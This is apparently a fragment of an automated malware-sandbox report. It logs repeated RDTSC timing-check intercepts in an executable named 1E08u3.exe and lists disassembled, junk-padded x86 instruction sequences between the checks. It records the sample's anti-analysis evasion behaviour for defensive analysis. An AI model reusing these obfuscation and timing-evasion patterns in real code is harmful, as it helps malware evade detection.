                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80684 second address: 4D80688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80688 second address: 4D806BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD3A4D6CB9Fh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD3A4D6CBA6h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D806BF second address: 4D806C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D806C3 second address: 4D806C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D806C7 second address: 4D806CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4CF0C10 second address: 4CF0C26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4CF0C26 second address: 4CF0C71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD3A47FEE96h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FD3A47FEE90h 0x00000016 push dword ptr [ebp+04h] 0x00000019 pushad 0x0000001a pushad 0x0000001b mov cx, F2B3h 0x0000001f mov esi, 4A03070Fh 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C0C second address: 4D30C28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C28 second address: 4D30C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C2C second address: 4D30C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C46 second address: 4D30C58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Eh 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C58 second address: 4D30C75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov edi, 7BE1ECA0h 0x0000000f mov di, 32CCh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bx, si 0x0000001c popad 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C75 second address: 4D30C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C7B second address: 4D30C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C7F second address: 4D30C83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30C83 second address: 4D30CC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD3A4D6CB9Fh 0x00000012 sbb eax, 0DC20E2Eh 0x00000018 jmp 00007FD3A4D6CBA9h 0x0000001d popfd 0x0000001e mov cx, 80B7h 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D209EE second address: 4D20A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE90h 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D20A02 second address: 4D20A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD3A4D6CB9Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FD3A4D6CBA0h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 push ecx 0x00000018 pop edi 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c pop ebp 0x0000001d pushad 0x0000001e jmp 00007FD3A4D6CB9Dh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70F4C second address: 4D70F6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, edx 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 jmp 00007FD3A47FEE8Eh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, dx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70F6E second address: 4D70F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70F73 second address: 4D70FB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 1B4FF5F1h 0x00000008 mov di, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 jmp 00007FD3A47FEE98h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD3A47FEE97h 0x0000001d rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E55 second address: 4D70E59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E59 second address: 4D70E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E5F second address: 4D70E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70E64 second address: 4D70EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD3A47FEE8Eh 0x0000000a add si, 9828h 0x0000000f jmp 00007FD3A47FEE8Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FD3A47FEE96h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD3A47FEE8Dh 0x00000028 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70EB4 second address: 4D70EBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70CC8 second address: 4D70CD4 instructions: 0x00000000 rdtsc 0x00000002 mov di, D64Ah 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a mov eax, ebx 0x0000000c rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70CD4 second address: 4D70D03 instructions: 0x00000000 rdtsc 0x00000002 mov al, bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FD3A4D6CB9Fh 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD3A4D6CBA5h 0x00000015 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70D03 second address: 4D70D23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 push edx 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70D23 second address: 4D70D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D70D29 second address: 4D70D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D10 second address: 4D30D2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D2D second address: 4D30D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D33 second address: 4D30D37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D37 second address: 4D30D3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30D3B second address: 4D30D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD3A4D6CBA2h 0x00000010 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80301 second address: 4D80305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D80305 second address: 4D8030B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D8030B second address: 4D80332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD3A47FEE90h 0x00000009 xor cx, 8F68h 0x0000000e jmp 00007FD3A47FEE8Bh 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D706CB second address: 4D706CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D706CF second address: 4D706F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d call 00007FD3A47FEE93h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40A83 second address: 4D40AF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD3A4D6CBA1h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD3A4D6CBA7h 0x00000015 sbb esi, 0ABAAA0Eh 0x0000001b jmp 00007FD3A4D6CBA9h 0x00000020 popfd 0x00000021 mov ax, E317h 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov di, 6C7Ah 0x0000002e call 00007FD3A4D6CB9Bh 0x00000033 pop eax 0x00000034 popad 0x00000035 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40AF0 second address: 4D40B36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push esi 0x0000000d pushfd 0x0000000e jmp 00007FD3A47FEE8Dh 0x00000013 jmp 00007FD3A47FEE8Bh 0x00000018 popfd 0x00000019 pop esi 0x0000001a mov si, bx 0x0000001d popad 0x0000001e mov eax, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40B36 second address: 4D40B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40B52 second address: 4D40B58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D40B58 second address: 4D40B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D000F8 second address: 4D00126 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD3A47FEE92h 0x00000008 or cl, FFFFFFD8h 0x0000000b jmp 00007FD3A47FEE8Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00126 second address: 4D0012A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0012A second address: 4D00130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00130 second address: 4D00136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00136 second address: 4D00161 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD3A47FEE8Eh 0x00000013 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00161 second address: 4D00167 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00167 second address: 4D0016B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0016B second address: 4D0016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0016F second address: 4D00247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FD3A47FEE99h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FD3A47FEE8Eh 0x00000015 and esp, FFFFFFF8h 0x00000018 jmp 00007FD3A47FEE90h 0x0000001d xchg eax, ecx 0x0000001e pushad 0x0000001f mov cx, 9DEDh 0x00000023 pushfd 0x00000024 jmp 00007FD3A47FEE8Ah 0x00000029 xor esi, 713FC988h 0x0000002f jmp 00007FD3A47FEE8Bh 0x00000034 popfd 0x00000035 popad 0x00000036 push eax 0x00000037 pushad 0x00000038 jmp 00007FD3A47FEE92h 0x0000003d popad 0x0000003e xchg eax, ecx 0x0000003f jmp 00007FD3A47FEE90h 0x00000044 xchg eax, ebx 0x00000045 jmp 00007FD3A47FEE90h 0x0000004a push eax 0x0000004b jmp 00007FD3A47FEE8Bh 0x00000050 xchg eax, ebx 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007FD3A47FEE90h 0x00000058 add al, FFFFFFA8h 0x0000005b jmp 00007FD3A47FEE8Bh 0x00000060 popfd 0x00000061 popad 0x00000062 mov ebx, dword ptr [ebp+10h] 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00247 second address: 4D0024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0024B second address: 4D00266 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00266 second address: 4D0026C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0026C second address: 4D00270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00270 second address: 4D002AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f pushfd 0x00000010 jmp 00007FD3A4D6CBA5h 0x00000015 or cx, ACD6h 0x0000001a jmp 00007FD3A4D6CBA1h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D002AD second address: 4D00330 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 jmp 00007FD3A47FEE98h 0x00000015 popad 0x00000016 mov esi, dword ptr [ebp+08h] 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FD3A47FEE8Eh 0x00000020 add si, 1C88h 0x00000025 jmp 00007FD3A47FEE8Bh 0x0000002a popfd 0x0000002b mov ecx, 30C79CFFh 0x00000030 popad 0x00000031 xchg eax, edi 0x00000032 jmp 00007FD3A47FEE92h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FD3A47FEE8Eh 0x0000003f rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00330 second address: 4D00387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CB9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD3A4D6CBA6h 0x0000000f test esi, esi 0x00000011 jmp 00007FD3A4D6CBA0h 0x00000016 je 00007FD41776AE43h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD3A4D6CBA7h 0x00000023 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D00387 second address: 4D003B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 1DFAh 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c cmp dword ptr [esi+08h], DDEEDDEEh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD3A47FEE98h 0x0000001a rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D003B4 second address: 4D003BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D003BC second address: 4D0048B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FD4171FD0EEh 0x0000000d jmp 00007FD3A47FEE99h 0x00000012 mov edx, dword ptr [esi+44h] 0x00000015 jmp 00007FD3A47FEE8Eh 0x0000001a or edx, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e pushad 0x0000001f mov edx, eax 0x00000021 mov eax, 74AD1F2Fh 0x00000026 popad 0x00000027 pushfd 0x00000028 jmp 00007FD3A47FEE94h 0x0000002d jmp 00007FD3A47FEE95h 0x00000032 popfd 0x00000033 popad 0x00000034 test edx, 61000000h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FD3A47FEE93h 0x00000043 adc si, 83CEh 0x00000048 jmp 00007FD3A47FEE99h 0x0000004d popfd 0x0000004e pushfd 0x0000004f jmp 00007FD3A47FEE90h 0x00000054 sbb cx, E448h 0x00000059 jmp 00007FD3A47FEE8Bh 0x0000005e popfd 0x0000005f popad 0x00000060 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D0048B second address: 4D004BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A4D6CBA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD41776AD76h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD3A4D6CB9Dh 0x00000016 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D004BD second address: 4D004F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD3A47FEE91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007FD3A47FEE8Ah 0x00000016 sub esi, 353BD438h 0x0000001c jmp 00007FD3A47FEE8Bh 0x00000021 popfd 0x00000022 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D004F6 second address: 4D00514 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 3A6Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 movzx ecx, di 0x0000000b popad 0x0000000c jne 00007FD41776AD35h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD3A4D6CB9Ah 0x00000019 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30019 second address: 4D30029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD3A47FEE8Ch 0x00000009 rdtsc
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeRDTSC instruction interceptor: First address: 4D30029 second address: 4D3006C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FD3A4D6CB9Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FD3A4D6CBA0h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD3A4D6CBA7h 0x0000001f rdtsc
